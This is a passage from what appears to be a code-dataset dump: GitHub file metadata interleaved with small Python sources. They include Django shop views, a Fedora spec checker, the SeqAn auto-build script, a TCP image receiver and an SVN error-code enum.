if fnd_ld != None:
fin_lst.append(' battery load: ' + str(fnd_ld.group(1)))
if fnd_vac != None:
fin_lst.append(' input VAC: ' + str(fnd_vac.group(1)))
print (" ".join(fin_lst)) + "\n"
log_f = open('/var/log/krv-apc1000x.log', 'a')
log_f.write(str(time.strftime('%d-%m-%Y %H:%M:%S')) + " " + (" ".join(fin_lst)) + "\n")
log_f.close()
else:
"The amount of attrib isn't correct!"
| [
"root@zabbix.interra.ru"
] | root@zabbix.interra.ru |
c2c5a3bd5bc7aa5c6d90f990321bbb6815626975 | 46d7bf2d5cfad08ef1301d3b3f54ddf07161df7d | /Jame.py | 8020a30c227104ba8eaad48c373ef4c16ff7d026 | [] | no_license | SanMuShen/Hobby | 6c498cba0091d8c7b7e31b543791a3711bcb2a16 | fe132108e4f593e87cf3f533adddd840e2a8de84 | refs/heads/master | 2020-03-30T00:46:09.771239 | 2018-09-27T03:53:17 | 2018-09-27T03:53:17 | 150,542,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48 | py | #!/usr/bin/python3
print('你好啊!带土')
| [
"yaxu@tedu.cn"
] | yaxu@tedu.cn |
09dbe557b734959de714b524c4c6d01b5e629ece | 40f68e2d7bf25fe6621a35f547f83fd003398c11 | /MShop/views.py | eff3df95af950cce74a484274f89e0e0b4db7ad9 | [] | no_license | DelaCerna-WebDev2/TasaShop | 91fc5c8828ef88fe0a7d5be4f71a9da91d804e20 | c3c30bdc11f85b071281b3658151647a4115b647 | refs/heads/main | 2023-05-09T08:39:01.236809 | 2021-06-04T00:44:28 | 2021-06-04T00:44:28 | 373,036,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from django.shortcuts import render
from .models import *
def shop(request):
products = Product.objects.all()
cont = {'products': products}
return render(request, 'shop.html', cont)
def cart(request):
if request.user.is_authenticated:
customer = request.user.customer
order, created = Order.objects.get_or_create(customer=customer, complete=False)
cartlist = order.cart_set.all()
else:
cartlist = []
cont = {'cartlist':cartlist}
return render(request, 'cart.html', cont)
def checkout(request):
cont = {}
return render(request, 'checkout.html', cont)
| [
"sharalyn.delacerna@gsfe.tupcavite.edu.ph"
] | sharalyn.delacerna@gsfe.tupcavite.edu.ph |
2f2d2f98b445b7c273a6c0c3b80e0ecc367e2b89 | e77d6b3dcc1deb5c7d22eaba6fb00dbc33d0e5ac | /scripts/check-specs.py | 16ae37cdb22e56b738e9d406ee80311f3678a753 | [
"MIT"
] | permissive | troycurtisjr/portingdb | a6a4d30b78eefacdfe0abb1a0a5be59fb6f5d7be | 6c5cf2b82551f4e40fc03d56e5f65d1dd2030d43 | refs/heads/master | 2021-07-06T19:56:27.646021 | 2017-09-22T14:39:49 | 2017-09-22T14:40:33 | 105,333,401 | 1 | 0 | null | 2017-09-30T02:11:26 | 2017-09-30T02:11:26 | null | UTF-8 | Python | false | false | 5,099 | py | #! /usr/bin/env python3
"""Get number of specs which are also used for rhel.
Check how many spec files among Fedora packages with naming issues
are cross platform, meaning that the same spec file is also used
for rhel/epel.
This check is pretty naive and gives just general information.
It checks spec files for using `%if %{?rhel}` conditionals
and may have false positives.
Usage: ./scripts/check-specs.py
The result of runnig this script is saved in `data/rhel-specs.json` file.
Use the following command to update contents of the file:
./scripts/check-specs.py --epel -o data/rhel-specs.json
"""
import click
import json
import logging
import os
import urllib.request
import urllib.error
from datetime import datetime
from multiprocessing import Pool
from sqlalchemy import create_engine
from portingdb.htmlreport import get_naming_policy_progress
from portingdb.load import get_db
logging.basicConfig(format='%(levelname)s: %(message)s')
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
MARKERS = ('%{?rhel}',)
SPEC_URL = 'http://pkgs.fedoraproject.org/cgit/rpms/{0}.git/plain/{0}.spec'
PKGDB_API = 'https://admin.fedoraproject.org/pkgdb/api/package/{}?acls=false'
def get_portingdb(db):
"""Return session object for portingdb."""
url = 'sqlite:///' + db
engine = create_engine(url)
return get_db(None, engine=engine)
def check_spec(package):
"""Given the package, check its spec file for cross platform MARKERS.
Arguments:
- package (Package object)
Return: package if MARKERS used in spec file, None otherwise
"""
spec_url = SPEC_URL.format(package.name)
try:
response = urllib.request.urlopen(spec_url)
except urllib.error.URLError as err:
logger.error('Failed to get spec %s. Error: %s', spec_url, err)
else:
spec = str(response.read())
for marker in MARKERS:
if marker in spec:
logger.warning('%s: %s', package.name, spec_url)
return package
logger.debug('Checked spec for %s: OK', package.name)
def check_branches(package):
"""Given the package, check if it is built for el6 or epel7.
Arguments:
- package (Package object)
Return: package if built for el6 or epel7, None otherwise
"""
api_url = PKGDB_API.format(package.name)
try:
response = urllib.request.urlopen(api_url)
except urllib.error.URLError as err:
logger.error('Failed to get package info %s. Error: %s', api_url, err)
else:
response = response.read()
result = json.loads(response.decode())
branches = [pkg['collection']['branchname'] for pkg in result['packages']]
return package.name, [el for el in branches if el in ('el6', 'epel7')]
def check_packages(packages, check_function):
"""Given the list of packages and a check_function,
call check_function on each of the package and return result.
Arguments:
- packages (iterable)
- check_function (function)
Return: list if packages filtered by check_function
"""
pool = Pool(processes=10)
result = pool.map_async(check_function, packages)
result.wait()
cross_platform_packages = [pkg for pkg in result.get() if pkg]
return cross_platform_packages
@click.command(help=__doc__)
@click.option('--db', help="Database file path.",
default=os.path.abspath('portingdb.sqlite'))
@click.option('--epel', help="Check if the found packages are built for epel.",
is_flag=True)
@click.option('-o', '--output',
help="File path to write the resulted list of packages to.")
def main(db, epel, output):
db = get_portingdb(db)
_, data = get_naming_policy_progress(db)
logger.info('Checking spec files for using %s...', ', '.join(MARKERS))
result = {}
for key, packages in data:
result[key[0].ident] = check_packages(packages, check_spec)
total = sum(packages.count() for _, packages in data)
total_cross_platform = sum(len(packages) for packages in result.values())
percentage = total_cross_platform * 100 / total
print('\nPackages that use {} in spec files: {} of {} ({:.2f}%)'.format(
', '.join(MARKERS), total_cross_platform, total, percentage))
for category, packages in result.items():
print(' {}: {}'.format(category, len(packages)))
if epel:
logger.info('Checking for epel branches...')
for category, packages in result.items():
result[category] = dict(check_packages(packages, check_branches))
total_epel = len([pkg for packages in result.values()
for pkg, branches in packages.items() if branches])
print('From those {}, have el6 or epel7 branch: {}'.format(
total_cross_platform, total_epel))
if output:
with open(output, 'w') as outfile:
result['generated_on'] = str(datetime.now())
json.dump(result, outfile, indent=2,
default=lambda package: package.name)
if __name__ == '__main__':
main()
| [
"ishcherb@redhat.com"
] | ishcherb@redhat.com |
8de02a0c1735cdd7cd60394002e7404d4a42b5d8 | c1291afe09bbee423442db59c5054023a8ec3fc9 | /seqan/util/py_lib/seqan/auto_build.py | 9d2a8936607b6440c2c1fcb8977ac149549b184b | [
"BSD-3-Clause"
] | permissive | xp3i4/linear | ae9e2053cf6021a37a8636c0ec93f75dd91faba8 | 10b5c152b6760b00ec948bdb7af1065c356f2b54 | refs/heads/main | 2023-04-15T03:56:42.432451 | 2023-01-15T03:43:22 | 2023-01-15T03:43:22 | 457,251,654 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 24,743 | py | #!/usr/bin/env python
"""
Automatic building of SeqAn apps and releases.
"""
from __future__ import print_function
import subprocess
import optparse
import os.path
import re
import sys
import shutil
import tempfile
# The git command to use.
GIT_BINARY='git'
# The CMake command to use.
CMAKE_BINARY='cmake'
# The default repository URL.
REPOSITORY_URL='https://github.com/seqan/seqan.git'
# The path to the package repository.
DEFAULT_PACKAGE_DB='.'
# Regular expression to use for tag names.
TAG_RE=r'.*-v\d+\.\d+\.\d(-\w+)?'
class MinisculeGitWrapper(object):
"""Minimal git wrapper."""
def lsRemote(self, url):
"""Execute 'git ls-remote ${url} --tags'."""
# Execute ls-remote command.
print('Executing "%s %s %s"' % (GIT_BINARY, 'ls-remote --tags', url), file=sys.stderr)
popen = subprocess.Popen([GIT_BINARY, 'ls-remote', '--tags', url],
stdout=subprocess.PIPE)
out_data, err_data = popen.communicate()
print(' => %d' % popen.returncode, file=sys.stderr)
if popen.returncode != 0:
print('ERROR during git call.', file=sys.stderr)
return 1
# Parse out revisions and tags names.
lines = out_data.splitlines()
revs_tags = [(line.split()[0], line.split()[-1]) for line in lines]
res = []
for rev, tag in revs_tags:
if '^{}' in tag:
continue # Skip with ^{} in tag name
tag2 = tag[10:]
res.append((rev, tag2))
return res
def checkout(self, path, treeish):
"""Execute "git checkout" in the checkout at path."""
# Executing git checkout.
args = [GIT_BINARY, 'checkout', treeish]
print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
popen = subprocess.Popen(args, cwd=path)
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during git call.', file=sys.stderr)
# Executing force resetting to current revision.
args = [GIT_BINARY, 'rm', '--cached', '.']
print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
popen = subprocess.Popen(args, cwd=path)
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during git call.', file=sys.stderr)
args = [GIT_BINARY, 'reset', '--hard']
print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
popen = subprocess.Popen(args, cwd=path)
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during git call.', file=sys.stderr)
return popen.returncode
def archive(self, path, treeish, output, prefix):
"""Execute git archive."""
args = [GIT_BINARY, 'archive', '--prefix=%s/' % prefix, '--output=%s' % output, treeish]
print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
popen = subprocess.Popen(args, cwd=path)
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during git call.', file=sys.stderr)
return popen.returncode
def clone(self, url, tag, dest_dir):
"""Execute 'git clone ${url} ${dest_dir}' and then get specific tag."""
# Clone repository
args = [GIT_BINARY, 'clone', url, dest_dir]
print('Executing "%s"' % ' '.join(args), file=sys.stderr)
popen = subprocess.Popen(args)
popen.wait()
print(' => %d' % popen.returncode, file=sys.stderr)
if popen.returncode != 0:
return popen.returncode
return self.checkout(dest_dir, tag)
class Package(object):
"""Represent a package with a given name, version, OS and architeture."""
def __init__(self, name, version, os, word_size, pkg_format):
self.name = name
self.version = version
self.os = os
self.word_size = word_size
SYS_NAMES = {'Windows': {'32': 'win32-i686', '64': 'win64-x86_64'},
'Linux': {'32': 'Linux-i686', '64': 'Linux-x86_64'},
'Mac': {'32': 'Darwin-i686', '64': 'Darwin-x86_64'}}
self.system_name = SYS_NAMES[os][word_size]
self.pkg_format = pkg_format
def fileName(self):
if self.name == 'seqan-library':
return '%s-%s.%s' % (self.name, self.version, self.pkg_format)
else:
return '%s-%s-%s.%s' % (self.name, self.version, self.system_name,
self.pkg_format)
class BuildStep(object):
"""Management of one build step."""
def __init__(self, path, treeish, name, version, os, word_size, pkg_formats,
repository_url, make_args, options, tmp_dir=None):
self.base_path = path
self.treeish = treeish
self.name = name
self.version = version.split('-', 1)[0]
print ( 'Version: %s Self.Version: %s' % (version, self.version), file=sys.stdout)
self.major_version = int(self.version.split('.')[0])
print ( 'Major_Version: %s' % self.major_version, file=sys.stdout)
self.minor_version = int(self.version.split('.')[1])
print ( 'Minor_Version: %s' % self.minor_version, file=sys.stdout)
self.patch_version = 0
if len(self.version.split('.')) > 2:
self.patch_version = int(self.version.split('.')[2])
self.version = '%d.%d.%d' % (self.major_version, self.minor_version, self.patch_version)
print ( 'Self_Version: %s' % self.version, file=sys.stdout)
self.os = os
self.word_size = word_size
self.pkg_formats = pkg_formats
if name == 'seqan':
self.packages = [Package(name + suffix, self.version, os, word_size, f)
for f in pkg_formats for suffix in ['-apps', '-library']]
else:
self.packages = [Package(name, self.version, os, word_size, f)
for f in pkg_formats]
self.repository_url = repository_url
self.make_args = make_args
self.options = options
# If set then this is used instead of a random name in TMPDIR.
self.tmp_dir = tmp_dir
def buildNeeded(self):
"""Returns whether one of the package files is missing."""
for p in self.packages:
package_path = os.path.join(self.base_path, p.name, p.fileName())
if 'x86' in package_path and 'x86_64' not in package_path: # fix processor name
package_path = package_path.replace('x86', 'x86_64')
if 'win32' in package_path or 'win64' in package_path: # fix OS name
package_path = package_path.replace('win32', 'Windows').replace('win64', 'Windows')
if 'Darwin' in package_path: # fix OS name
package_path = package_path.replace('Darwin', 'Mac')
if not os.path.exists(package_path):
if self.options.verbosity >= 1:
print('File %s does not exist yet.' % package_path, file=sys.stderr)
return True
elif self.options.verbosity >= 1:
print('File %s exists.' % package_path, file=sys.stderr)
return False
def copyArchives(self, build_dir):
"""Copy built packages to base_path directory."""
for p in self.packages:
from_ = os.path.join(build_dir, p.fileName())
if os.path.exists(from_):
to = os.path.join(self.base_path, p.name, os.path.basename(from_))
if not os.path.exists(os.path.dirname(to)): # Create directory if necessary.
os.makedirs(os.path.dirname(to))
print("Copying %s => %s" % (from_, to), file=sys.stderr)
if 'x86' in to and 'x86_64' not in to: # fix processor name
to = to.replace('x86', 'x86_64')
if 'win32' in to or 'win64' in to: # fix OS name
to = to.replace('win32', 'Windows').replace('win64', 'Windows')
if 'Darwin' in to: # fix OS name
to = to.replace('Darwin', 'Mac')
shutil.copyfile(from_, to)
else:
print('%s does not exist (not fatal)' % from_, file=sys.stderr)
def buildSeqAnRelease(self, checkout_dir, build_dir):
"""Build SeqAn release: Apps and library build."""
# Build seqan-apps.
#
# Create build directory.
if not os.path.exists(build_dir):
print('Creating build directory %s' % (build_dir,), file=sys.stderr)
os.mkdir(build_dir)
# Execute CMake.
cmake_args = [CMAKE_BINARY, checkout_dir,
'-DSEQAN_BUILD_SYSTEM=SEQAN_RELEASE_APPS']
# Use appropriate CMake flags for OS and processor.
# Use appropriate CMake flags for OS and processor.
if self.word_size == '32':
cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=i686')
if self.os != 'Windows':
cmake_args.append('-DCMAKE_CXX_FLAGS=-m32')
else:
cmake_args += ['-G', 'Visual Studio 10']
else: # self.word_size == '64'
cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=x86_64')
if self.os == 'Windows':
cmake_args += ['-G', 'Visual Studio 10 Win64']
print('Executing CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during make call.', file=sys.stderr)
print(out_data, file=sys.stderr)
print(err_data, file=sys.stderr)
return 1
# Execute Make.
cmake_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'package', '--config', 'Release', '--'] + self.make_args
print('Building with CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during make call.', file=sys.stderr)
print(out_data, file=sys.stderr)
print(err_data, file=sys.stderr)
return 1
# Copy over the archives.
self.copyArchives(build_dir)
# Remove build directory.
if not self.options.keep_build_dir:
print('Removing build directory %s' % build_dir, file=sys.stderr)
shutil.rmtree(build_dir)
# Build seqan-library.
#
# Create build directory.
if not os.path.exists(build_dir):
print("Creating build directory %s" % (build_dir,), file=sys.stderr)
os.mkdir(build_dir)
# Execute CMake.
cmake_args = [CMAKE_BINARY, checkout_dir,
"-DSEQAN_BUILD_SYSTEM=SEQAN_RELEASE_LIBRARY"]
print('Executing CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during make call.', file=sys.stderr)
print(out_data, file=sys.stderr)
print(err_data, file=sys.stderr)
return 1
# Build Docs
cmake_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'docs', '--'] + self.make_args
print('Building with CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during make docs call.', file=sys.stderr)
print(out_data, file=sys.stderr)
print(err_data, file=sys.stderr)
# Execute Make.
cmake_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'package', '--'] + self.make_args
print('Building with CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during make call.', file=sys.stderr)
print(out_data, file=sys.stderr)
print(err_data, file=sys.stderr)
return 1
self.copyArchives(build_dir)
# Remove build directory.
if not self.options.keep_build_dir:
print('Removing build directory %s' % build_dir, file=sys.stderr)
shutil.rmtree(build_dir)
def buildApp(self, checkout_dir, build_dir):
"""Build an application."""
# Create build directory.
print("Creating build directory %s" % (build_dir,), file=sys.stderr)
if not os.path.exists(build_dir):
os.mkdir(build_dir)
# Execute CMake.
cmake_args = [CMAKE_BINARY, checkout_dir,# '-G', 'Visual Studio 10',
"-DCMAKE_BUILD_TYPE=Release",
"-DSEQAN_BUILD_SYSTEM=APP:%s" % self.name,
"-DSEQAN_APP_VERSION=%d.%d.%d" %
(self.major_version, self.minor_version, self.patch_version)]
# Use appropriate CMake flags for OS and processor.
if self.word_size == '32':
cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=i686')
if self.os != 'Windows':
cmake_args.append('-DCMAKE_CXX_FLAGS=-m32')
else:
cmake_args += ['-G', 'Visual Studio 10']
else: # self.word_size == '64'
cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=x86_64')
if self.os == 'Windows':
cmake_args += ['-G', 'Visual Studio 10 Win64']
print('Executing CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
#for key in sorted(os.environ.keys()):
# print(key, ': ', os.environ[key], file=sys.stderr)
popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during make call.', file=sys.stderr)
print(out_data, file=sys.stderr)
print(err_data, file=sys.stderr)
return 1
# Build and package project.
make_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'package', '--config', 'Release']
if self.options.verbosity > 1:
make_args.insert(1, 'VERBOSE=1')
print('Building with CMake: "%s"' % (' '.join(make_args),), file=sys.stderr)
popen = subprocess.Popen(make_args, cwd=build_dir)
out_data, err_data = popen.communicate()
if popen.returncode != 0:
print('ERROR during make call.', file=sys.stderr)
print(out_data, file=sys.stderr)
print(err_data, file=sys.stderr)
return 1
# Copy out archives.
self.copyArchives(build_dir)
# Remove build directory.
if not self.options.keep_co_dir:
print('Removing build directory %s' % build_dir, file=sys.stderr)
shutil.rmtree(build_dir)
def tmpDir(self):
print('self.tmp_dir = %s' % self.tmp_dir, file=sys.stderr)
if self.tmp_dir:
if not os.path.exists(self.tmp_dir):
os.makedirs(self.tmp_dir)
return self.tmp_dir
else:
return tempfile.mkdtemp()
def execute(self):
"""Execute build step."""
# Create temporary directory.
tmp_dir = self.tmpDir()
print('Temporary directory is %s' % (tmp_dir,), file=sys.stderr)
# Create Git checkout in temporary directory.
checkout_dir = os.path.join(tmp_dir, os.path.basename(self.repository_url))
print('Creating checkout in %s' % checkout_dir, file=sys.stderr)
git = MinisculeGitWrapper()
git.clone(self.repository_url, self.treeish, checkout_dir)
# Create build directory.
suffix = '-build-%s-%s' % (self.os, self.word_size)
build_dir = os.path.join(tmp_dir, os.path.basename(self.repository_url) + suffix)
if os.path.exists(build_dir) and not self.options.keep_build_dir:
print('Removing build directory %s' % (build_dir,), file=sys.stderr)
shutil.rmtree(build_dir)
# insert app tags
subprocess.call(['../tag-apps.sh', checkout_dir])
# Perform the build. We have to separate between app and whole SeqAn releases.
if self.name == 'seqan':
self.buildSeqAnRelease(checkout_dir, build_dir)
else:
self.buildApp(checkout_dir, build_dir)
if not self.options.keep_co_dir:
print('Removing checkout directory %s' % (checkout_dir,), file=sys.stderr)
shutil.rmtree(checkout_dir)
# Remove temporary directory again.
if self.tmp_dir and not self.options.keep_tmp_dir:
# Only remove if not explicitely given and not forced to keep.
print('Removing temporary directory %s' % (tmp_dir,), file=sys.stderr)
shutil.rmtree(tmp_dir)
def workTags(options):
"""Run the individual steps for tags."""
# Get the revisions and tag names.
git = MinisculeGitWrapper()
#revs_tags = [(rev, tag) for (rev, tag) in git.lsRemote(options.repository_url)
#if re.match(TAG_RE, tag)]
tags = [tag for (rev, tag) in git.lsRemote(options.repository_url)
if re.match(TAG_RE, tag)]
tags.extend(subprocess.check_output(['../tag-apps.sh', os.getcwd(), 'printonly']).split('\n'))
# Enumerate all package names that we could enumerate.
print('tags = %s' % tags, file=sys.stderr)
print('word_sizes = %s' % options.word_sizes, file=sys.stderr)
for tag in tags:
name, version = tag.rsplit('-v', 1)
#version = version[1:]
print ('Tag: %s Name: %s Version: %s' % (tag, name, version), file=sys.stdout)
for word_size in options.word_sizes.split(','):
# Create build step for this package name.
pkg_formats = options.package_formats.split(',')
build_step = BuildStep(options.package_db, tag, name, version, options.os,
word_size, pkg_formats, options.repository_url,
options.make_args.split(), options, options.tmp_dir)
# Check whether we need to build this.
if not build_step.buildNeeded():
continue # Skip
# Execute build step.
build_step.execute()
return 0
def workTrunk(options):
"""Run the individual steps for the trunk with fake tag name."""
# Get the revisions and tag names.
git = MinisculeGitWrapper()
# Enumerate all package names that we could enumerate.
print('fake tag = %s' % options.build_trunk_as, file=sys.stderr)
print('word_sizes = %s' % options.word_sizes, file=sys.stderr)
name, version = options.build_trunk_as.rsplit('-', 1)
version = version[1:]
for word_size in options.word_sizes.split(','):
# Create build step for this package name.
pkg_formats = options.package_formats.split(',')
build_step = BuildStep(options.package_db, 'master', name, version, options.os,
word_size, pkg_formats, options.repository_url,
options.make_args.split(), options, options.tmp_dir)
# Check whether we need to build this.
if not build_step.buildNeeded():
continue # Skip
# Execute build step.
build_step.execute()
return 0
def workSrcTar(options):
"""Build the source tarball."""
# Get the revisions and tag names.
git = MinisculeGitWrapper()
revs_tags = [(rev, tag) for (rev, tag) in git.lsRemote(options.repository_url)
if re.match(TAG_RE, tag)]
# Enumerate all package names that we could enumerate.
for rev, tag in revs_tags:
# Build URL.
name, version = tag.rsplit('-', 1)
version = version[1:] # remove prefix "v"
if name != 'seqan':
continue # only build source tarballs for seqan
# Create destination file name.
file_name = '%s-src-%s.tar.gz' % (name, version)
dest = os.path.join(options.package_db, '%s-src' % name, file_name)
# Check whether we need to rebuild.
if os.path.exists(dest):
print('Skipping %s; already exists.' % dest, file=sys.stderr)
continue
# Create temporary directory.
if options.tmp_dir:
if not os.path.exists(options.tmp_dir):
os.makedirs(options.tmp_dir)
tmp_dir = options.tmp_dir
else:
tmp_dir = tempfile.mkdtemp()
print('Temporary directory is %s' % tmp_dir, file=sys.stderr)
# Create git checkout in temporary directory.
checkout_dir = os.path.join(tmp_dir, tag)
print('Creating checkout in %s' % checkout_dir, file=sys.stderr)
from_ = os.path.join(tmp_dir, file_name)
git.clone(options.repository_url, tag, checkout_dir)
# Create target directory if it does not exist yet.
if not os.path.exists(os.path.dirname(dest)): # Create directory if necessary.
os.makedirs(os.path.dirname(dest))
# Create tarball.
git.archive(checkout_dir, tag, dest, prefix='%s-%s' % (name, version))
# Remove temporary directory again.
if tmp_dir and not options.keep_tmp_dir:
# Only remove if not explicitely given and not forced to keep.
print('Removing temporary directory %s' % (tmp_dir,), file=sys.stderr)
shutil.rmtree(tmp_dir)
return 0
def work(options):
"""Run the steps."""
if options.src_tar:
return workSrcTar(options)
elif not options.build_trunk_as:
return workTags(options)
else:
return workTrunk(options)
def main():
"""Program entry point."""
# Parse Arguments.
parser = optparse.OptionParser()
parser.add_option('-u', '--repository-url', default=REPOSITORY_URL,
help='The git repository URL.', metavar='URL')
parser.add_option('--package-db', dest='package_db', type='string',
default=DEFAULT_PACKAGE_DB,
help='Path the directory with the packages.')
parser.add_option('--src-tar', dest='src_tar', action='store_true',
help='If specified then only the src tarball will be created')
parser.add_option('-v', dest='verbosity', action='count', default=1,
help='Increase verbosity.')
parser.add_option('--package-formats', dest='package_formats',
default='tar.bz2,zip',
help='Expect the following packages to be created.')
parser.add_option('--os', dest='os', help='Expect the packages to be created for this OS.',
default='Linux')
parser.add_option('--word-sizes', dest='word_sizes', default='32,64',
help='Build binaries with the given word sizes')
parser.add_option('--make-args', dest='make_args', type="string", default='',
help='Arguments for make.')
parser.add_option('--tmp-dir', dest='tmp_dir', type='string', default=None,
help='Temporary directory to use. Use this to reuse the same checkout.')
parser.add_option('--build-trunk-as', dest='build_trunk_as', type='string', default=None,
help='Build current trunk with this string as a tag name.')
parser.add_option('--keep-build-dir', dest='keep_build_dir', default=False,
action='store_true', help='Keep build directory.')
parser.add_option('--keep-tmp-dir', dest='keep_tmp_dir', default=False,
action='store_true', help='Keep temporary directory.')
parser.add_option('--keep-co-dir', dest='keep_co_dir', default=False,
action='store_true', help='Keep checkout directory.')
parser.epilog = ('The program will use the environment variable TMPDIR as '
'the directory for temporary files.')
options, args = parser.parse_args()
if args:
parser.error('No arguments expected!')
return 1
options.package_db = os.path.abspath(options.package_db)
# Fire up work.
print('Running SeqAn Auto Builder', file=sys.stderr)
return work(options)
| [
"cxpan@zedat.fu-berlin.de"
] | cxpan@zedat.fu-berlin.de |
ffb7f84314f3ce3965341cd0c04f5b5ec5d3771a | fe3e0d0a779ef7e4b4088dcb3ee56d89f669ac8d | /day03/pm/q5.py | 9715cbda6cc7d2189c01b95690cfd91332e07b47 | [] | no_license | sgmpy/quizzes | c6d389916ec5c75ae2dbf3de51a250352bdf9a8f | 714b25969f79bb9744e1b4fb1fbe93d987e59f62 | refs/heads/master | 2020-04-12T07:07:47.710557 | 2018-12-20T14:42:10 | 2018-12-20T14:42:10 | 162,357,831 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | '''
문제 5.
표준 입력으로 물품 가격 여러 개가 문자열 한 줄로 입력되고, 각 가격은 ;(세미콜론)으로 구분되어 있습니다.
입력된 가격을 높은 가격순으로 출력하는 프로그램을 만드세요.
# 입력 예시: 300000;20000;10000
'''
prices = input('물품 가격을 입력하세요: ')
# 아래에 코드를 작성해 주세요. | [
"no.water.in.the.house@gmail.com"
] | no.water.in.the.house@gmail.com |
d3a7e0ce6c8f1bf4acb2acb0c1a2ea60044ca6ad | b2d36c05e9eb5b7ea3ec4f4eba682703d536e137 | /hclass.py | ce761b75ecc1affb275fb34928f1051fd01db5e2 | [] | no_license | z-positive/drweb | 52d72df835b3c5c9f376b53907c371990db99818 | 2506b2ae4aca1bd46cec9ee750225114d75ca4b4 | refs/heads/master | 2020-04-01T17:44:44.829721 | 2018-10-29T07:52:02 | 2018-10-29T07:52:02 | 153,447,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,413 | py | class Handle:
objects = {}
def __init__(self, query):
self.elements = query.split(' ')
self.router(self.elements[0])
print(self.objects)
def router(self, action):
if action == 'SET':
self.objects[self.elements[1]] = self.elements[2]
elif action == 'GET':
print(self.objects[self.elements[1]])
elif action == 'UNSET':
print('Удаляем значение ', self.elements[1])
del self.objects[self.elements[1]]
elif action == 'COUNTS':
self.counts(self.elements[1])
elif action == 'FIND':
self.find(self.elements[1])
elif action == 'END':
exit()
def counts(self, data):
i=0
count = 0
for item in self.objects:
if self.objects[item] == data:
count+=1
print('Количество переменных со значением {0} составляет {1}'.format(data, count))
def find(self,data):
i=0
count = 0
lst = []
for item in self.objects:
if self.objects[item] == data:
lst.append(item)
print('Переменная {0} встречается в переменных {1}'.format(data, lst))
| [
"noreply@github.com"
] | noreply@github.com |
f8550d69577aae249382d041cd32bcab3d3c55fb | b87dbd94e7ec70aab888dfeeb23bcfedc5bc22a8 | /TCP/2/upload.py | 914662f389e3af1cd2d122f2ed3a0e55c305c021 | [] | no_license | CostSiwasit/305445-Network | 105d93b5f8feb828ca7eb221c45b3e53555866dd | ac809c655b7cc269dbe736e00669e1ec4fab3ad3 | refs/heads/master | 2021-05-09T19:11:04.100812 | 2018-01-23T16:05:12 | 2018-01-23T16:05:12 | 118,633,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | import sys
import socket
import os
TCP_IP = "127.0.0.1"
TCP_PORT = 5007
FILE_NAME = 'IMG_001.jpg'
print "TCP target IP:", TCP_IP
print "TCP target port:", TCP_PORT
print "Image:", FILE_NAME
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.bind((TCP_IP,TCP_PORT))
sock.listen(10)
while 1:
data,addr = sock.accept()
newpath = r'ImaGe/'
if not os.path.exists(newpath):
os.makedirs(newpath)
fileUpload = open(newpath + FILE_NAME, "wb")
Data = data.recv(1024)
while Data:
fileUpload.write(Data)
Data = data.recv(1024)
print "Upload Completed"
sock.close()
| [
"noreply@github.com"
] | noreply@github.com |
3eb870c63aff20c6821a235a064079297001494b | 2289bc6c6307753839d128782d6feac16881b568 | /svn/errors.py | 56ae0b721705c81f719a70b9d372d872f28d82b2 | [] | no_license | IARI/asp_grader | 2fca4c6f7b55a483ee9e21f8759af241316e814c | 35bd20b4f49dbe470be5952de4fc7e834828acca | refs/heads/master | 2021-01-10T17:47:01.092880 | 2016-04-13T13:37:42 | 2016-04-13T13:37:42 | 55,492,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,788 | py | from enum import IntEnum
import types
class SVNError(ValueError):
def __init__(self, message, returncode, cmd):
super().__init__(message)
self.message = message
self.svn_errcode = None
self.returncode = returncode
self.cmd = cmd
def __str__(self):
return "Command failed with ({:d}) {}: {}\n{}".format(self.returncode,
self.svn_errcode,
self.cmd,
self.message)
class SVNErrorCode(IntEnum):
APMOD_ACTIVITY_NOT_FOUND = 190002
APMOD_BAD_BASELINE = 190003
APMOD_CONNECTION_ABORTED = 190004
APMOD_MALFORMED_URI = 190001
APMOD_MISSING_PATH_TO_FS = 190000
